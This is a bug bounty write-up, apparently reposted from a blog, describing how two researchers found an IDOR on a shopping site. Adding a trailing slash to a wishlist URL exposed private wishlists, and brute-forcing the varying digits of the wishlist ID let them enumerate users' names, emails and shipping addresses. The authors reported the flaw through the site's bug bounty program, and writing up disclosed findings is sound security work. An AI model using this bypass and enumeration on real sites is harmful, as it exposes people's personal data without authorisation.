avatarSupun Halangoda (Suppa)

Summary

The article details the discovery and exploitation of an IDOR vulnerability in a shopping website's wishlist feature, allowing unauthorized access to users' private information.

Abstract

In a collaborative effort, the author and their friend Hasanka, also known as WrathfulDiety, uncovered a security flaw in a shopping website's wishlist functionality. The vulnerability permitted the viewing of any user's private and public wishlists by manipulating the URL. Through methodical testing, they found that appending a forward slash ("/") to the wishlist URL bypassed the security checks, revealing the private wishlist of another user. Further investigation into the wishlist ID pattern revealed a combination of static and dynamic components, which upon brute-forcing, allowed the enumeration of all wishlists. This exposure led to the potential compromise of sensitive user data, including names, email addresses, shipping addresses, and wishlist contents. The issue was responsibly disclosed through the website's Bug Bounty Program, resulting in a reward for the finders.

Opinions

  • The author emphasizes the importance of responsible disclosure and adherence to legal and ethical guidelines when dealing with security vulnerabilities.
  • Collaboration between security researchers, in this case, the author and Hasanka, is highlighted as a valuable approach to uncovering and addressing security issues.
  • The article suggests that even seemingly minor URL manipulations can lead to significant security breaches, underscoring the need for thorough security testing.
  • The author expresses gratitude towards their collaborator, Hasanka, for his contributions and encourages readers to explore Hasanka's other security-related writings.
  • The vulnerability's discovery process showcases the meticulous nature of security research, involving pattern analysis, brute-forcing, and the creation of wishlists for comparison.

Hacking Wishlists in an E-commerce Web App (IDOR Diaries)

Hi all, this write-up is about a vulnerability founded by collaborating with my friend Hasanka AKA WrathfulDiety.

If you haven’t checked other writes on the IDOR Diaries series you check below write-ups

Vulnerability

We was testing a Shopping website where we came across a wired wishlist. We were able to view private and public wishlists fo any user in the website. So the wishlist URL looked like below sample URL

https://www.xyz.com/find/wishlist.jsp#/1122A36R456/supun-default-wish-list

First we tried removing the /supun-default-wish-list which gave us a 404 error . The URl looked like below

https://www.xyz.com/find/wishlist.jsp#/1122A36R456

Then we added “/” to the url which looked like

https://www.xyz.com/find/wishlist.jsp#/1122A36R456/

It provided the results of the private wishlist of another user.

Now that we can bypass the Wishlist by adding “/” to the end of the URL. We thought to dig deeper to find an IDOR to enumerate all Wishlists.

As we saw that it has a unique ID like /1122A36R456/ we tried to find a flaw in this ID and after investigation we founded that it has a pattern. but its a weird pattern.

Here’s the ID pattern breakdown.

The ID is 1122A36R456

As shown in above figure the Static IDs remains the same and Dynamic IDs can be brute forced. (How we founded this was we created some wishlists and compared each wishlist ID and that how we founded the static IDs and Dynamic IDs)

Then we set the payloads to the Dynamic position. 1st position with 2 numbers and 2nd position with 3 numbers. and we started to bruteforce.

We Enumerated all private and public wishlists which led to expose the user’s Name, Email & Shipping Address & their wishlist products.

We reported this issue via their Bug Bounty Program and got rewarded.

I should Thank my friend Hasanka AKA WrathfulDiety on working with me on this submission. He has some great writeups too. Go checkout them.

LinkedIn : https://www.linkedin.com/in/hasanka-amarasinghe/

Please remember to use this knowledge responsibly and comply with legal and ethical guidelines when conducting security assessments and disclosing vulnerabilities.

Bugbounty Writeup
Infosec
Red Team
Cybersecurity
Idor
Recommended from ReadMedium
avatarThexssrat
The Ultimate Checklist for Detecting IDOR and Broken Access Control Vulnerabilities

When testing web applications for security vulnerabilities, Insecure Direct Object References (IDOR) and Broken Access Control (BAC) are…

4 min read
avatarIt4chis3c
Choosing Your First Program in Bug Bounties: A Beginner’s Guide

Hey geeks, it4chis3c (Twitter) comes up with another write-up in my Bug Bounty Hunting Series:

5 min read
avatarAbhirupKonwar
Unique dorks to find self-hosted programs for Bug Hunting

How to find self-hosted bug bounty and VDP programs

6 min read
avatarJosekutty Kunnelthazhe Binu
How to Bypass Company Email Feature While Creating an Account

An easy bug for beginners

2 min read
avatarMr Horbio
OTP BYPASS TECHNIQUE its My Story [sweet and sour]

Hi Hackers welcome back with another article. This is my story when i was struggling for bypass rate limit or some kind of restrictions.

3 min read
avatarSupun Halangoda (Suppa)
Exploiting IDOR in a Support Portal Chatbot

Sometimes, I avoid testing support or help portals, assuming they might be hosted on third-party platforms like Jira or Zendesk, to save…

3 min read